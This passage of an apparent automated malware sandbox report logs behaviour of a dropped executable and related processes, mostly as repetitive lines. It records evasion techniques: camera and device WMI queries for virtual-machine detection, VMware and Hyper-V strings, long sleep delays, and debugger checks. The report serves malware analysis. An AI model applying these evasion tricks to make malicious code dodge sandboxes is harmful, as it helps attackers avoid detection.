Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Source: C:\bridgeportserver\blockServerruntime.exe	Memory allocated: 8F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Memory allocated: 1A4D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Memory allocated: 960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Memory allocated: 1A470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Memory allocated: D00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Memory allocated: 1A810000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Memory allocated: E70000 memory reserve \| memory write watch
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Memory allocated: 1A950000 memory reserve \| memory write watch

Source: C:\bridgeportserver\blockServerruntime.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599875
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599766
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599656
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599547
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599437
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599328
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599219
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599108
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599000
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598891
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598781
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598672
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598562
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598453
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598344
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598234
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598125
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598016
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597870
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597719
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597609
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597500
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597242
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597125
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597015
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 596906
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595791
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595668
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595547
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595437
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595327
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595219
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595109
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595000
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 594891
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 594781
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 594672
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 594562
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 594452

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\bridgeportserver\blockServerruntime.exe	Window / User API: threadDelayed 535	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe	Window / User API: threadDelayed 1670	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Window / User API: threadDelayed 537	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Window / User API: threadDelayed 359	Jump to behavior
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Window / User API: threadDelayed 3380
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Window / User API: threadDelayed 6266

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-22933

Source: C:\bridgeportserver\blockServerruntime.exe TID: 7504	Thread sleep count: 535 > 30	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe TID: 7504	Thread sleep count: 1670 > 30	Jump to behavior
Source: C:\bridgeportserver\blockServerruntime.exe TID: 7472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 7876	Thread sleep count: 537 > 30	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 7724	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 7908	Thread sleep count: 359 > 30	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 7812	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -25825441703193356s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -3600000s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -600000s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -599875s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -599766s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -599656s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -599547s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -599437s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -599328s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -599219s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -599108s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -599000s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -598891s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -598781s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -598672s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -598562s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -598453s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -598344s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -598234s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -598125s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -598016s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -597870s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -597719s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -597609s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -597500s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -597242s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -597125s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -597015s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -596906s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -595791s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -595668s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -595547s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -595437s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -595327s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -595219s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -595109s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -595000s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -594891s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -594781s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -594672s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -594562s >= -30000s
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe TID: 5824	Thread sleep time: -594452s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\bridgeportserver\blockServerruntime.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D5A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,		0_2_00D5A5F4
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D6B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_00D6B8E0

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: 0_2_00D6DD72 VirtualQuery,GetSystemInfo,

0_2_00D6DD72

Source: C:\bridgeportserver\blockServerruntime.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599875
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599766
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599656
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599547
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599437
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599328
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599219
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599108
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 599000
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598891
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598781
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598672
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598562
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598453
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598344
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598234
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598125
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 598016
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597870
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597719
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597609
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597500
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597242
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597125
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 597015
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 596906
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595791
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595668
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595547
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595437
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595327
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595219
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595109
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 595000
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 594891
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 594781
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 594672
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 594562
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Thread delayed: delay time: 594452

Source: blockServerruntime.exe, 00000004.00000002.1745037784.000000001B871000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: blockServerruntime.exe, 00000004.00000002.1745121196.000000001B8B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
Source: wscript.exe, 00000001.00000003.1702148499.0000000003472000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: qVUjshNEHYUOCXyHyUMQwFlZoe.exe, 0000001C.00000002.2894438858.000000001B860000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

API call chain: ExitProcess graph end node

graph_0-23332

Source: C:\bridgeportserver\blockServerruntime.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: 0_2_00D7866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00D7866F

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: 0_2_00D7753D mov eax, dword ptr fs:[00000030h]

0_2_00D7753D

Source: C:\Users\user\Desktop\N0tepkRPzw.exe

Code function: 0_2_00D7B710 GetProcessHeap,

0_2_00D7B710

Source: C:\bridgeportserver\blockServerruntime.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Recovery\qVUjshNEHYUOCXyHyUMQwFlZoe.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D6F063 SetUnhandledExceptionFilter,	0_2_00D6F063
Source: C:\Users\user\Desktop\N0tepkRPzw.exe	Code function: 0_2_00D6F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00D6F22B
